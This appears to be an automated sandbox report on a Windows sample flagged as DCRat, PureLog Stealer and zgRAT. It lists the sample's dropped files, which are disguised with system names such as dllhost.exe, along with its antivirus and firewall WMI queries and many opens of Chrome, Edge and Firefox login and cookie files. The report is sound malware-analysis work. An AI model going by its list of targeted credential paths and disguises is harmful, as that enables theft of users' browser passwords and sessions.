Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.4103094451.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103094451.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103094451.000000000342D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1689492935.0000000012ED7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eu6OEBpBCI.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 6924, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: eu6OEBpBCI.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eu6OEBpBCI.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1642613306.00000000004E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\Libraries\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\fontdrvhost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: eu6OEBpBCI.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eu6OEBpBCI.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\Public\Libraries\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\fontdrvhost.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
